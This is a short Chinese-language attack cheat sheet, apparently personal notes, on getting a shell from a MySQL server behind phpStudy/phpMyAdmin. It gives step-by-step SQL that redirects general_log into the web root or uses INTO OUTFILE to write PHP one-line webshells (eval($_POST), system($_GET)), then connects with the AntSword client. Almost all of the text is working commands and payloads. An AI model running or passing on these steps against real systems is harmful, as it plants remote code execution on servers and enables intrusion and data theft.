1.通过日志文件拿shell
show global variables like '%general%';
set global general_log='on';
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'
查看日志目录路径
show global variables like '%general%';
打开日志功能
set global general_log='on';
最右边有个执行按钮,可以执行
设置日志文件目录,创建php日志文件
set global general_log_file='D:/phpStudy_pro/WWW/9.php';
查看自己创建的日志文件
show global variables like '%general%';
可以写入一句话木马用蚁剑连接
2. 上传日志文件拿shell
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)
和第一个一样,写入一句话木马,用蚁剑连接
3界面图像化GetShell
(如果过滤了into outfile 第一种的图形化操作)
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";
写入一句话木马
用蚁剑连接